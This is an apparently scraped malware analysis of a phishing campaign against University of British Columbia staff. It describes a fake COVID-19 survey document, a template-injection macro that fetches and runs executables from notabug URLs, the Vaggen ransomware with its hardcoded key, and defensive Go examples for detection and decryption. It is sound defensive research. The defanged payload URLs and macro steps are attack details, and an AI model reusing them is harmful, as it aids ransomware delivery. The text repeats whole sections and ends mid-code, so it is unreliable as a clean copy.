3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 743 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!

In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro.
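Template injection works because the .docx itself carries no macro: its word/_rels/settings.xml.rels part holds an attachedTemplate relationship with TargetMode="External", and Word fetches and loads whatever that relationship's Target names when the document is opened, so a scanner that only looks for VBA inside the attachment sees nothing. The Go program below is an added example written for this page, not code from the original post or a Malwarebytes tool: it opens a document as the zip package it is, reads every .rels part, and reports attachedTemplate relationships whose target is an http(s) URL or UNC path, while leaving alone the file:/// reference to a local Normal.dotm that legitimate documents often carry. The two documents it checks are constructed in memory, and the template URL in the first one (example.invalid) is a placeholder, not an indicator from this campaign.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"strings"
)

// Added example, not code from the original post. On open, Word resolves the
// attachedTemplate relationship in word/_rels/settings.xml.rels; when it is
// External with an http(s) or UNC target, a remote .dotm (macros and all) loads.

type relationship struct {
	Type       string `xml:"Type,attr"`
	Target     string `xml:"Target,attr"`
	TargetMode string `xml:"TargetMode,attr"`
}

type relationships struct {
	Rels []relationship `xml:"Relationship"`
}

// isRemote reports whether a target leaves the local machine. An ordinary
// document may carry an External attachedTemplate that points at a local
// file:/// path (its Normal.dotm); only network targets are worth flagging.
func isRemote(target string) bool {
	t := strings.ToLower(target)
	return strings.HasPrefix(t, "http://") || strings.HasPrefix(t, "https://") ||
		strings.HasPrefix(t, `\\`)
}

// RemoteTemplates returns one "part -> target" entry per remote
// attachedTemplate relationship in the package; a clean file yields none.
func RemoteTemplates(doc []byte) ([]string, error) {
	zr, err := zip.NewReader(bytes.NewReader(doc), int64(len(doc)))
	if err != nil {
		return nil, fmt.Errorf("not an OOXML (zip) package: %w", err)
	}
	var hits []string
	for _, f := range zr.File {
		if !strings.HasSuffix(f.Name, ".rels") {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		data, err := io.ReadAll(rc)
		rc.Close()
		if err != nil {
			return nil, err
		}
		var rels relationships
		if err := xml.Unmarshal(data, &rels); err != nil {
			return nil, fmt.Errorf("%s: %w", f.Name, err)
		}
		for _, r := range rels.Rels {
			if strings.HasSuffix(r.Type, "/attachedTemplate") &&
				strings.EqualFold(r.TargetMode, "External") && isRemote(r.Target) {
				hits = append(hits, f.Name+" -> "+r.Target)
			}
		}
	}
	return hits, nil
}

// buildDoc wraps a settings.xml.rels part in a minimal zip package so the
// example runs without a real .docx on disk.
func buildDoc(settingsRels string) []byte {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	w, _ := zw.Create("word/_rels/settings.xml.rels")
	io.WriteString(w, settingsRels)
	zw.Close()
	return buf.Bytes()
}

const relsHead = `<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">`
const tmplType = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"

// Constructed samples. The remote URL is a placeholder on the reserved
// example.invalid domain, not an indicator from the campaign.
var (
	InjectedDoc = buildDoc(relsHead + `<Relationship Id="rId1" Type="` + tmplType +
		`" Target="https://example.invalid/template.dotm" TargetMode="External"/></Relationships>`)
	CleanDoc = buildDoc(relsHead + `<Relationship Id="rId1" Type="` + tmplType +
		`" Target="file:///C:\Users\staff\AppData\Roaming\Microsoft\Templates\Normal.dotm" TargetMode="External"/></Relationships>`)
)

func main() {
	for name, doc := range map[string][]byte{"injected.docx": InjectedDoc, "clean.docx": CleanDoc} {
		hits, err := RemoteTemplates(doc)
		fmt.Printf("%s: remote templates=%v err=%v\n", name, hits, err)
	}
}
```

To check a real file, read it with os.ReadFile and pass the bytes to RemoteTemplates. A non-empty result is the remote-template signature of this campaign's lure, and the target it returns is the URL to block and to hunt for in proxy logs.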
The template (template.dotm) was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from the following URL and writes it as Polisen.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
Downloads a file from the following URL and writes it as Killar.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Calls the Shell function to execute killar.exe
Checks the return value of Shell to see whether the launch succeeded (the return value is the task ID of the executed application)
If successful, sends a GET HTTP request to:
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If it isn’t successful, sends a GET HTTP request to:
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document and letting the macro run triggers a notification via the canarytokens.com website. Typically, people use this type of service to get alerted on a particular event; it can be very useful as an early warning system that an intruder has had access to a network.
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user’s files, adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go, which starts with the function denoted as ‘main_main’.

Other functions belonging to the main application have obfuscated names, such as main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA and main_SPRINGA. Three of them map to the following behavior:

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming of the files is implemented as the callback of the standard Go function filepath.Walk (package path/filepath).

Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption algorithm is similar to the one demonstrated here.
The malware uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom; the file content is encrypted with the gcm.Seal function.

The output file (with the .VAGGEN extension) contains:

the 12-byte nonce
the encrypted content
the 16-byte GCM tag

The hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”; the trailing 0 pads the phrase to exactly 32 bytes, the AES-256 key length. Using this key, we can easily decrypt the content.

With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point whether the University of British Columbia was the sole target or not.

Crawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia.
This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs

Variant 1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f

Variant 3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp

Variant 4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a
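Everything needed to undo the encryption is in the analysis above: the key is hardcoded and the same for every victim, the nonce is the first 12 bytes of each .VAGGEN file, and the GCM tag at the end authenticates the rest. The Go program below is an added example written for this page; it is neither the malware's code nor a Malwarebytes tool. It rebuilds the file layout from the Vaggen ransomware section and decrypts it with the quoted key, assuming Go's default GCM parameters (12-byte nonce, 16-byte tag), which is what that layout implies. The encrypt side exists only so the decryptor can be exercised offline, and the plaintext it uses is constructed.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"io"
)

// Added example, not code from the original post or from the malware. A
// .VAGGEN file, as described in the analysis, is laid out as
//   nonce (12 bytes) || AES-256-GCM ciphertext || GCM tag (16 bytes).
// Go's gcm.Seal appends the tag to the ciphertext, so nonce followed by
// Seal's output is exactly that layout, and gcm.Open takes the remainder
// (ciphertext || tag) back as one slice.

// Key quoted in the analysis: 32 bytes, hence AES-256, and identical for
// every victim, which is why recovery needs nothing from the attacker.
var VaggenKey = []byte("du_tar_mitt_hjart_mina_pengarna0")

const nonceSize = 12

func newGCM(key []byte) (cipher.AEAD, error) {
	if len(key) != 32 {
		return nil, fmt.Errorf("AES-256 needs a 32-byte key, got %d", len(key))
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block) // standard 12-byte nonce, 16-byte tag
}

// EncryptVaggen produces a blob in the .VAGGEN layout. It exists only so the
// decryptor can be exercised offline; crypto/rand supplies the nonce here,
// the role CryptGenRandom played in the sample.
func EncryptVaggen(key, plaintext []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceSize)
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return nil, err
	}
	// Seal appends ciphertext||tag to its first argument, so passing the
	// nonce as dst yields nonce||ciphertext||tag in one buffer.
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

// DecryptVaggen recovers the plaintext from a .VAGGEN blob. A wrong key, a
// truncated file or a single flipped byte fails the tag check and returns an
// error rather than garbage, so a bulk recovery run can trust every file it
// writes back.
func DecryptVaggen(key, blob []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	if len(blob) < nonceSize+gcm.Overhead() {
		return nil, errors.New("too short to hold a nonce and a GCM tag")
	}
	nonce, rest := blob[:nonceSize], blob[nonceSize:]
	return gcm.Open(nil, nonce, rest, nil)
}

func main() {
	// Constructed sample; a real run would read each *.VAGGEN file instead.
	plain := []byte("constructed sample: contents of a victim's document")
	blob, err := EncryptVaggen(VaggenKey, plain)
	if err != nil {
		panic(err)
	}
	fmt.Printf("blob: %d bytes = 12 nonce + %d ciphertext + 16 tag\n", len(blob), len(plain))
	got, err := DecryptVaggen(VaggenKey, blob)
	fmt.Printf("recovered: %q (err=%v)\n", got, err)
	blob[len(blob)-1] ^= 1 // corrupt one tag byte
	_, err = DecryptVaggen(VaggenKey, blob)
	fmt.Println("after corrupting the tag:", err)
}
```

For a real recovery, read each *.VAGGEN file, call DecryptVaggen on its bytes, and write the result under the original name only when the call returns without error. Because the tag covers the whole ciphertext, a clean return also proves the file was not truncated or damaged on disk, so there is no guessing about sizes or partial writes.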
On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 783 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 784 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 785 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 786 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 819 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 820 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 821 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 822 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 823 of 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.

In recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives are different from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality from these platforms to distribute it.

This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from file sharing services without creating a number of false positives.

The attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. Please fill it out ASAP!
You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!
In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file since it was shared privately, instead of publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:
Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from the following URL and writes it as Polisen.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
Downloads a file from the following URL and writes it as Killar.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Calls the Shell function to execute killar.exe
Checks the return value of the Shell function to see whether it was successful (the return value would be the task ID of the executed application)
If successful, it sends a GET HTTP request to:
canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If it isn’t successful, it sends a GET HTTP request to:
canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted about a particular event. This can be very useful as an early-warning system that an intruder has had access to a network. In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD, to be paid in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.

Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming of the files is deployed as the callback of the standard Go library function filepath.Walk (from the path/filepath package).

Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption algorithm is similar to the one demonstrated here. It uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.

The output file (with the .VAGGEN extension) contains:
the 12-byte nonce
the encrypted content
the 16-byte GCM tag

The hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.

With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point whether the University of British Columbia was the sole target.

Crawling additional repositories created by the threat actor, we found other Word template files that used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia. This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.
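The .VAGGEN layout and the hardcoded key described above are enough to decrypt files offline. The following is an added example, not code from the Malwarebytes post or from the malware: it parses a .VAGGEN blob as nonce || ciphertext || tag, decrypts it with AES-256-GCM, and rejects truncated or tampered files through the tag check. EncryptVaggen, the vaggenExt constant and the sample file are constructed here only so the example runs without a real sample.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
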